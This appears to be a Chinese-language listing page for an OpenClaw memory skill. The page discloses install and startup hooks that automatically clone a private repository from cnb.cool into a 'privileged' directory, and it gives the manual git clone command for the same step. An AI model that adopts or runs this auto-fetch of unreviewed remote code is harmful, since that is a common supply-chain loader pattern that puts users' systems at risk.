Install
openclaw skills install llm-memory-v8-fixLLM Memory Integration - 接口层 + 自动化钩子。安装后自动从 CNB 仓库拉取私有增强包。
openclaw skills install llm-memory-v8-fix本包包含生命周期钩子,会在安装时自动执行网络操作:
| 钩子 | 触发时机 | 行为 |
|---|---|---|
postinstall.py | 安装完成后 | 从 cnb.cool 克隆私有包 |
onStartup.py | Gateway 启动时 | 检查私有包更新 |
请知悉:
git clone 命令(subprocess 调用)https://cnb.cool/llm-memory-integrat/llm~/.openclaw/workspace/skills/llm-memory-integration/src/privileged/本包采用"公开包 + 私有包"架构:
| 组件 | 内容 | 风险等级 |
|---|---|---|
| 公开包(本包) | 接口定义 + FTS 回退实现 | 🟢 低风险 |
| 私有包(CNB) | 高性能实现 + 原生扩展 + API 集成 | 🟡 中风险 |
私有包来源:https://cnb.cool/llm-memory-integrat/llm
安装本技能后,系统会自动执行:
src/privileged/如需禁用自动安装:
# 安装时跳过钩子
clawhub install llm-memory-integration --no-hooks
如果自动安装失败,可手动执行:
git clone https://cnb.cool/llm-memory-integrat/llm.git \
~/.openclaw/workspace/skills/llm-memory-integration/src/privileged
| 权限 | 用途 |
|---|---|
git 二进制 | 克隆私有包 |
网络访问 cnb.cool | 下载私有包 |
写入 src/privileged/ | 安装私有包 |
读写 ~/.openclaw/memory-tdai/ | 记忆数据库 |
版本: 8.0.1
许可: MIT-0
作者: xkzs2007